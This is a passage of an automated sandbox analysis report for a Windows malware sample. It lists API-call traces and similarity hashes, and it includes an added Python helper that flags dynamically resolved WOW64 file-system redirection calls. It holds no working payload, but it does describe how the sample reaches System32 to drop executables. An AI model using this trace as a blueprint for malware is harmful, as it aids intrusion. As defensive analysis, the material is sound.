                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                        • Part of subcall function 00403F77: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                        • Part of subcall function 00404032: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                        • Part of subcall function 004040ED: ??3@YAXPAX@Z.MSVCRT(?,?,0041984C,%%P,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404114
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00405715
                                                                        • Part of subcall function 0040327D: GetEnvironmentVariableW.KERNEL32(004056AD,?,00000001,xu_,00000000,H|_,?,?,004056AD,?,?,?,?,?,?), ref: 00403293
                                                                        • Part of subcall function 0040327D: GetEnvironmentVariableW.KERNEL32(004056AD,00000000,?,00000001,00000002,?,?,004056AD,?,?,?,?,?,?), ref: 004032BF
                                                                        • Part of subcall function 00402B71: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                        • Part of subcall function 00402B71: ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,005F9D00,?,?,?,xu_,?,H|_,?,00419810,?,?,?), ref: 004056F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$Environment$Variable$ExpandStrings
                                                                      • String ID: H|_$xu_
                                                                      • API String ID: 2352103411-4026904983
                                                                      • Opcode ID: cd0632ae3cb62befe143438c45848d6e603760a0b2c7569f7b16b59909fdaf46
                                                                      • Instruction ID: e77c6db790fd3265e7e8a04a5d27ee92cfaa5bcfb68e3ac2f2838415660c2c6c
                                                                      • Opcode Fuzzy Hash: cd0632ae3cb62befe143438c45848d6e603760a0b2c7569f7b16b59909fdaf46
                                                                      • Instruction Fuzzy Hash: EE21FC75C0010DAACF00FBE5DC46CDE7B7CEA44709B40847BF610B3191D739AA558BA8
                                                                      APIs
                                                                        • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                        • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                      • wsprintfW.USER32 ref: 00404F19
                                                                      • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$??3@wsprintf
                                                                      • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                      • API String ID: 1174869416-1550840741
                                                                      • Opcode ID: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
                                                                      • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                      • Opcode Fuzzy Hash: 95ec4e621bfc920f5473338c82ae4d920d2910342d5ae7ea90fe2488f177eb41
                                                                      • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                      APIs
                                                                      • GetEnvironmentVariableW.KERNEL32(004056AD,?,00000001,xu_,00000000,H|_,?,?,004056AD,?,?,?,?,?,?), ref: 00403293
                                                                      • GetEnvironmentVariableW.KERNEL32(004056AD,00000000,?,00000001,00000002,?,?,004056AD,?,?,?,?,?,?), ref: 004032BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID: H|_$xu_
                                                                      • API String ID: 1431749950-4026904983
                                                                      • Opcode ID: ff2b79dc44754d6f907cf6e634d94b8b1123ce8e5b5ca496a994bbb7e1074a74
                                                                      • Instruction ID: 7df30db2680526248f54be3d9c295913fdf74715706c85616ae183fd9519d1a4
                                                                      • Opcode Fuzzy Hash: ff2b79dc44754d6f907cf6e634d94b8b1123ce8e5b5ca496a994bbb7e1074a74
                                                                      • Instruction Fuzzy Hash: A6F09C71600118BFDB01AF59DC419ADB7EDEF88764B10403BF945D72A1D7B5DD008794
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                      • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                      • _wcsnicmp.MSVCRT ref: 0040423D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$_wcsnicmp
                                                                      • String ID: Mg@
                                                                      • API String ID: 2823567412-3680729969
                                                                      • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                      • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                      • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                      • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                      • API String ID: 2574300362-3900151262
                                                                      • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                      • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                      • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                      • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                      • API String ID: 2574300362-736604160
                                                                      • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                      • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                      • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                      • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
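The two records above (LoadLibraryA of kernel32 followed by GetProcAddress, with Wow64RevertWow64FsRedirection and Wow64DisableWow64FsRedirection on the stack) are the run-time import resolution that the report's signatures "Contains functionality to dynamically determine API calls" and "Drops executables to the windows directory (C:\Windows) and starts them" rest on: a 32-bit process must switch WOW64 file-system redirection off to reach the real System32. The following Python is an added triage helper, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses the "APIs" lines in the format used throughout this section and flags such dynamically resolved redirection toggles. Its reading that the second stack slot on the LoadLibraryA line is the name pushed for the following GetProcAddress is an interpretation of the listing (Joe Sandbox prints raw stack slots at the call site, more than the API's own arity), not something the report states; the sample input is constructed from lines of the records above.

```python
"""Triage helper for a Joe Sandbox function record's "APIs" listing.

Added example, not part of the report or of Joe Sandbox. It parses lines such as

    • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
      • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,...), ref: 00402B0A
    • wsprintfW.USER32 ref: 00404F19

into structured records, then reports imports that are resolved at run time through
LoadLibrary*/GetProcAddress, singling out the WOW64 file-system redirection toggles
(the mechanism a 32-bit binary needs to drop files into the real C:\\Windows\\System32).
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: lines copied from the records above plus one subcall line
# and one call without an argument list, so every branch of the parser is exercised.
SAMPLE = """\
• LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
• GetProcAddress.KERNEL32(00000000), ref: 004023CF
• LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
• GetProcAddress.KERNEL32(00000000), ref: 00402401
  • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?), ref: 00402B0A
• wsprintfW.USER32 ref: 00404F19
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, "Api.MODULE",
# an optional "(stack,slots)" list, and the "ref: XXXXXXXX" call-site address.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Stack slots that carry no name: unknown ('?') or an 8-digit hex address/value.
ADDR_OR_UNKNOWN = re.compile(r"^(?:\?|[0-9A-Fa-f]{8})$")

WOW64_FSREDIR = {
    "Wow64DisableWow64FsRedirection",
    "Wow64RevertWow64FsRedirection",
    "Wow64EnableWow64FsRedirection",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw stack slots as printed, in order
    ref: int                   # call-site address
    subcall_of: Optional[int]  # address of the subcall function, if indented under one


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse every well-formed API line; other lines (headers, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module").upper(),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def dynamic_imports(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Return (dll, procedure) pairs resolved via LoadLibrary* followed by GetProcAddress.

    Interpretation, not something the report states: the listing prints raw stack
    slots at the call site, so for the usual
        push <procname>; push <dllname>; call LoadLibraryA; push eax; call GetProcAddress
    sequence the DLL name is slot 0 and the procedure name pushed for GetProcAddress
    is slot 1 of the LoadLibrary line. Slots that are '?' or addresses are ignored.
    """
    pairs = []
    for i, call in enumerate(calls):
        if not call.api.startswith("LoadLibrary"):
            continue
        if not any(c.api == "GetProcAddress" for c in calls[i + 1:i + 3]):
            continue
        names = [a for a in call.args if a and not ADDR_OR_UNKNOWN.match(a)]
        if len(names) >= 2:
            pairs.append((names[0].lower(), names[1]))
    return pairs


def triage_notes(calls: List[ApiCall]) -> List[str]:
    """Human-readable findings for the record: one line per WOW64 redirection toggle."""
    notes = []
    for dll, proc in dynamic_imports(calls):
        if proc in WOW64_FSREDIR:
            notes.append(f"{dll}!{proc} resolved at run time: toggles WOW64 file-system "
                         f"redirection, so a 32-bit process can write into the real System32")
    return notes


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    for c in parsed:
        where = f" (subcall {c.subcall_of:08X})" if c.subcall_of is not None else ""
        print(f"{c.ref:08X} {c.module}!{c.api}{where} args={c.args}")
    for note in triage_notes(parsed):
        print("FLAG:", note)
```

Running the file prints the six parsed calls and two FLAG lines. The same parser accepts the longer ??3@YAXPAX@Z records earlier in this section (the API name may contain `?` and `@`, and `%%T\` style slots are kept verbatim); those records produce no dynamic-import flag because they contain no LoadLibrary/GetProcAddress pair.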
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                        • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$ByteCharMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1731127917-0
                                                                      • Opcode ID: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
                                                                      • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                      • Opcode Fuzzy Hash: f6ac9d4c0139cef4d9b8beefe4760dccd727682243e06668031b0770e13a0576
                                                                      • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
                                                                      APIs
                                                                      • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                      • memcpy.MSVCRT(00000000,005F9D00,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                      • ??3@YAXPAX@Z.MSVCRT(005F9D00,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                      • String ID:
                                                                      • API String ID: 3462485524-0
                                                                      • Opcode ID: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
                                                                      • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                      • Opcode Fuzzy Hash: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
                                                                      • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                      APIs
                                                                        • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                      • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                      • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                        • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                        • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                        • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                        • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                      • String ID:
                                                                      • API String ID: 3043669009-0
                                                                      • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                      • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                                      • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                      • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                      • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                      • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                      • DeleteObject.GDI32(00000000), ref: 00407126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                      • String ID:
                                                                      • API String ID: 1900162674-0
                                                                      • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                      • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                      • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                      • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                      APIs
                                                                      • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                      • GetClientRect.USER32(?,?), ref: 004085C2
                                                                      • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                        • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                      • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                      • String ID:
                                                                      • API String ID: 3015594791-0
                                                                      • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                      • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                      • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                      • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                      APIs
                                                                        • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                        • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                      • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@TextWindow$Length
                                                                      • String ID:
                                                                      • API String ID: 2308334395-0
                                                                      • Opcode ID: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
